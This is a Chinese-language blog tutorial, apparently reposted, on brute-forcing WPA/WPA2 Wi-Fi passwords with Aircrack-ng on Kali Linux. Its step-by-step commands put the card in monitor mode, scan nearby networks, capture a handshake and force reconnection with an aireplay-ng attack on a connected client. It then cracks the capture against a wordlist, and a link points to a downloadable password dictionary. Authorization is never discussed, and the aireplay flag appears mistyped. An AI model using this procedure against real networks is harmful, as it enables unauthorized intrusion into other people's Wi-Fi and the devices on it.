Kali使用Aircrack-ng进行暴力破解WIFI密码
Kali系統(tǒng)使用Aircrack-ng進(jìn)行暴力破解WIFI密碼
- 一、什么是Aircrack-ng
- 運(yùn)行環(huán)境
- 插入網(wǎng)卡設(shè)備
- 二、破解流程
- 1.進(jìn)入管理員模式
- 2.查看網(wǎng)卡信息
- 3.殺掉沖突進(jìn)程
- 4.查看網(wǎng)卡是否支持監(jiān)聽模式
- 5.開啟無線網(wǎng)卡監(jiān)聽模式
- 5.獲取附近的AP信息(搜WIFI)
- 6.開始抓取握手包并保存成文件
- (1) 等待新的設(shè)備連接WIFI
- (2) 主動(dòng)攻擊
- 6. 破解握手包密碼
- 7.關(guān)閉監(jiān)聽模式
- 三、總結(jié)
- 1.問題
- 2.密碼字典
一、什么是Aircrack-ng
Aircrack-ng是一個(gè)與802.11標(biāo)準(zhǔn)的無線網(wǎng)絡(luò)分析有關(guān)的安全軟件,主要功能有:網(wǎng)絡(luò)偵測(cè),數(shù)據(jù)包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持監(jiān)聽模式的無線網(wǎng)卡上(設(shè)備列表請(qǐng)參閱其官方網(wǎng)站)并嗅探802.11a,802.11b,802.11g的數(shù)據(jù)。該程序可運(yùn)行在Linux和Windows上。Linux版本已經(jīng)被移植到了Zaurus和Maemo系統(tǒng)平臺(tái), 并概念驗(yàn)證可移植到iPhone。
運(yùn)行環(huán)境
使用Kali 2021.3進(jìn)行演示操作
軟件:aircrack-ng(Kali系統(tǒng)內(nèi)置)
外置無線網(wǎng)卡設(shè)備: 要支持監(jiān)聽,支持Linux并且免驅(qū)(我這里使用的是RT3070)
插入網(wǎng)卡設(shè)備
二、破解流程
1.進(jìn)入管理員模式
命令: sudo su
解釋: 不在管理員模式下運(yùn)行可能會(huì)有權(quán)限不夠的提示
提示:執(zhí)行命令之后輸入Kali的密碼,密碼是被隱藏的,直接輸入然后回車即可
2.查看網(wǎng)卡信息
命令: iwconfig/ifconfig
解釋: iwconfig查看網(wǎng)卡的信息、ifconfig查看新連接的設(shè)備
wlan0就是我們的無線網(wǎng)卡
3.殺掉沖突進(jìn)程
命令: airmon-ng check kill
解釋: 殺死進(jìn)程可以讓搜索更準(zhǔn)確,不會(huì)受到影響
4.查看網(wǎng)卡是否支持監(jiān)聽模式
命令: airmon-ng
出現(xiàn)你的網(wǎng)卡信息就說明你的網(wǎng)卡支持監(jiān)聽
5.開啟無線網(wǎng)卡監(jiān)聽模式
命令: airmon-ng start wlan0
解釋: start開啟哪個(gè)接口 wlan0是接口的名字
再用iwconfig查看一下網(wǎng)卡信息,wlan0后面多了個(gè)mon,wlan0mon就說明已經(jīng)開啟監(jiān)聽了
5.獲取附近的AP信息(搜WIFI)
命令: airodump-ng wlan0mon
解釋: BSSID:WIFI的MAC地址、PWR:信號(hào)強(qiáng)度(值越小信號(hào)強(qiáng)度強(qiáng))、Data:監(jiān)聽期間流量總合、CH:信道、ENC:加密算法、ESSID:WIFI名稱
提示:找到網(wǎng)絡(luò)之后CTRL+Z結(jié)束搜索就可以
6.開始抓取握手包并保存成文件
命令: airodump-ng -c (頻道號(hào)) --bssid (MAC地址) -w (抓取的數(shù)據(jù)包的保存位置) wlan0mon
解釋:
我要破解的目標(biāo)網(wǎng)絡(luò)是Test,CH(信道)是11,MAC地址是E2:D4:64:02:73:A8,我在根目錄下創(chuàng)建了一個(gè)名為1的文件夾
輸入命令: airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon
提示:所有的數(shù)值都要寫剛剛查到要破解的WIFI其中一個(gè)客戶端的值
(1) 等待新的設(shè)備連接WIFI
當(dāng)新的客戶端連接時(shí),客戶端輸入密碼連接就可以抓到握手包,右上角出現(xiàn)WPA時(shí)就表示已經(jīng)抓到了對(duì)方的握手包
(2) 主動(dòng)攻擊
命令: aireplay-ng -o 2 -a BSSID(MAC地址) -c STATION wlan0mon
解釋:
執(zhí)行命令aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon
捕捉到握手包時(shí)就停止攻擊
注意:執(zhí)行主動(dòng)攻擊的時(shí)候新建一個(gè)終端執(zhí)行命令,原來的抓包終端不要結(jié)束
6. 破解握手包密碼
命令: aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap
解釋:
最后就是等待跑字典了,下面就是破解的WIFI密碼,密碼是20041101
7.關(guān)閉監(jiān)聽模式
命令: airmon-ng stop wlan0mon
在監(jiān)聽模式下,kali不能連接網(wǎng)絡(luò)
三、總結(jié)
1.問題
插入網(wǎng)卡,如果查看不到網(wǎng)卡信息,可以點(diǎn)開連接WIFI看一下能否搜索到附近的網(wǎng)絡(luò),如果不行那就右鍵系統(tǒng)可移動(dòng)設(shè)備-把網(wǎng)卡斷開再重新連接一下
2.密碼字典
插入網(wǎng)卡,打開網(wǎng)卡的監(jiān)聽模式,搜索附近的WIFI,獲取握手包,最后跑字典破解握手包,這里給大家提供一個(gè)常用的密碼字典
鏈接: https://pan.baidu.com/s/1NSNniAvaLdcY0HALbBnUTw?pwd=gg7y
提取碼: gg7y
總結(jié)
以上是生活随笔為你收集整理的Kali使用Aircrack-ng进行暴力破解WIFI密码的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java jsp开发的电子商务系统代码下
- 下一篇: SSL数字证书是什么?